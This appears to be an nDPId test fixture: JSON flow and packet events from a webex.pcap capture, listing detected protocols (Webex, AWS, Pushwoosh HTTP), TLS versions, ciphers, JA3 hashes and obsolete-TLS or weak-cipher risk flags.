+00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1059,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1444570693244,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570693244,"pkt":"ABoRAAACABoRAAABCABFAAAoAxBAABAGr1at8wBuCggAAQG72Xfw8AopDw\/111AS\/\/8cNQAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1060,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1444570693245,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570693245,"pkt":"ABoRAAACABoRAAABCABFAAAoLONAAEAGVYMKCAABrfMAbtl3AbsPD\/XX8PAKKlAQOQjjLQAA"} +00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1063,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570693238,"flow_last_seen":1444570693297,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570693297,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01403{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1074,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570693238,"flow_last_seen":1444570693766,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"thread_ts_msec":1444570693766,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1112,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570694561,"flow_last_seen":1444570694561,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570694561,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51839,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1112,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1444570694561,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570694561,"pkt":"ABoRAAACABoRAAABCABFAAA802lAAEAGOT4KCAABPm3lnsp\/AbubwQrQAAAAAKACOQiUEgAAAgQFtAQCCAoATNm5AAAAAAEDAwY="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1113,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1444570694564,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570694564,"pkt":"ABoRAAACABoRAAABCABFAAAoAytAABAGOZE+beWeCggAAQG7yn9kPvUvm8EK0VAS\/\/+1ggAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1114,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1444570694564,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570694564,"pkt":"ABoRAAACABoRAAABCABFAAAo02pAAEAGOVEKCAABPm3lnsp\/AbubwQrRZD71MFAQOQh8ewAA"} +00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1115,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570694561,"flow_last_seen":1444570694614,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570694614,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51839,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1230,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570699074,"flow_last_seen":1444570699074,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570699074,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1230,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1444570699074,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570699074,"pkt":"ABoRAAACABoRAAABCABFAAA8OjpAAEAGn3oKCAABNvEgDrSDAbvRQeFHAAAAAKACOQhpXwAAAgQFtAQCCAoATNt9AAAAAAEDAwY="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1231,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1444570699077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699077,"pkt":"ABoRAAACABoRAAABCABFAAAoA2VAABAGBmQ28SAOCggAAQG7tIMuvh640UHhSFAS\/\/+YiwAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1232,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1444570699077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699077,"pkt":"ABoRAAACABoRAAABCABFAAAoOjtAAEAGn40KCAABNvEgDrSDAbvRQeFILr4euVAQOQhfhAAA"} +00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1233,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699074,"flow_last_seen":1444570699079,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570699079,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"api.crittercism.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1235,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570699096,"flow_last_seen":1444570699096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570699096,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1235,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1444570699096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570699096,"pkt":"ABoRAAACABoRAAABCABFAAA8731AAEAGBawKCAABTi7tW+lsAFBr3TT9AAAAAKACOQhjAgAAAgQFtAQCCAoATNuAAAAAAAEDAwY="} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1236,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1444570699101,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699101,"pkt":"ABoRAAACABoRAAABCABFAAAoA2dAABAGIddOLu1bCggAAQBQ6WyUIssCa900\/lAS\/\/+AggAA"} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1237,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570699101,"flow_last_seen":1444570699101,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570699101,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59757,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1237,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1444570699101,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570699101,"pkt":"ABoRAAACABoRAAABCABFAAA8ZgxAAEAGjx0KCAABTi7tW+ltAFASyr2MAAAAAKACOQgzhQAAAgQFtAQCCAoATNuAAAAAAAEDAwY="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1238,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1444570699106,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699106,"pkt":"ABoRAAACABoRAAABCABFAAAoA2hAABAGIdZOLu1bCggAAQBQ6W3tNUJzEsq9jVAS\/\/+AgQAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1239,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1444570699107,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699107,"pkt":"ABoRAAACABoRAAABCABFAAAo735AAEAGBb8KCAABTi7tW+lsAFBr3TT+lCLLA1AQOQhHewAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1240,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1444570699107,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699107,"pkt":"ABoRAAACABoRAAABCABFAAAoZg1AAEAGjzAKCAABTi7tW+ltAFASyr2N7TVCdFAQOQhHegAA"} +00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1241,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699096,"flow_last_seen":1444570699201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1444570699201,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cp.pushwoosh.com","url":"cp.pushwoosh.com\/json\/1.3\/registerDevice","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; LG-D855 Build\/KVT49L.A1412087656)"}} +00849{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1243,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570699096,"flow_last_seen":1444570699202,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":626,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1444570699202,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cp.pushwoosh.com","url":"cp.pushwoosh.com\/json\/1.3\/registerDevice","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; LG-D855 Build\/KVT49L.A1412087656)"}} +00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1245,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699101,"flow_last_seen":1444570699212,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":334,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1444570699212,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59757,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cp.pushwoosh.com","url":"cp.pushwoosh.com\/json\/1.3\/applicationOpen","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; LG-D855 Build\/KVT49L.A1412087656)"}} +01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1251,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570699074,"flow_last_seen":1444570699636,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1382,"flow_tot_l4_payload_len":1598,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1444570699636,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"api.crittercism.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"c800cea031c10ffe47e1d72c9264577a","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +01349{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1259,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1444570699074,"flow_last_seen":1444570699643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5712,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":1444570699643,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"api.crittercism.com","server_names":"*.crittercism.com,crittercism.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"c800cea031c10ffe47e1d72c9264577a","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL Wildcard, CN=*.crittercism.com","fingerprint":"68:8B:FC:77:1E:CA:80:33:0C:A9:0E:29:A6:E4:0D:FC:3A:AE:43:18"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1271,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570699916,"flow_last_seen":1444570699916,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570699916,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1271,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1444570699916,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570699916,"pkt":"ABoRAAACABoRAAABCABFAAA8M+lAAEAGPjwKCAABUEpuRIMPAbsBc+gmAAAAAKACOQj74QAAAgQFtAQCCAoATNvPAAAAAAEDAwY="} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1272,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1444570699917,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699917,"pkt":"ABoRAAACABoRAAABCABFAAAoA3lAABAGnsBQSm5ECggAAQG7gw\/+jBfZAXPoJ1AS\/\/9icAAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1273,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1444570699917,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699917,"pkt":"ABoRAAACABoRAAABCABFAAAoM+pAAEAGPk8KCAABUEpuRIMPAbsBc+gn\/owX2lAQOQgpaQAA"} +00928{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1274,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699916,"flow_last_seen":1444570699968,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570699968,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00969{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1282,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570699916,"flow_last_seen":1444570700123,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570700123,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1302,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570700561,"flow_last_seen":1444570700561,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570700561,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1302,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1444570700561,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570700561,"pkt":"ABoRAAACABoRAAABCABFAAA8d7ZAAEAG+m4KCAABUEpuRIMRAbsN6aumAAAAAKACOQgrqQAAAgQFtAQCCAoATNwQAAAAAAEDAwY="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1303,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1444570700563,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570700563,"pkt":"ABoRAAACABoRAAABCABFAAAoA4lAABAGnrBQSm5ECggAAQG7gxHyFlRZDemrp1AS\/\/9ibgAA"} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1304,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570700563,"flow_last_seen":1444570700563,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570700563,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33554,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1304,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1444570700563,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570700563,"pkt":"ABoRAAACABoRAAABCABFAAA8CyVAAEAGZwAKCAABUEpuRIMSAbsmf9c3AAAAAKACOQjnfgAAAgQFtAQCCAoATNwSAAAAAAEDAwY="} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1305,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1444570700565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570700565,"pkt":"ABoRAAACABoRAAABCABFAAAoA4pAABAGnq9QSm5ECggAAQG7gxLZgCjIJn\/XOFAS\/\/9ibQAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1306,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1444570700565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570700565,"pkt":"ABoRAAACABoRAAABCABFAAAod7dAAEAG+oEKCAABUEpuRIMRAbsN6aun8hZUWlAQOQgpZwAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1307,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1444570700565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570700565,"pkt":"ABoRAAACABoRAAABCABFAAAoCyZAAEAGZxMKCAABUEpuRIMSAbsmf9c42YAoyVAQOQgpZgAA"} 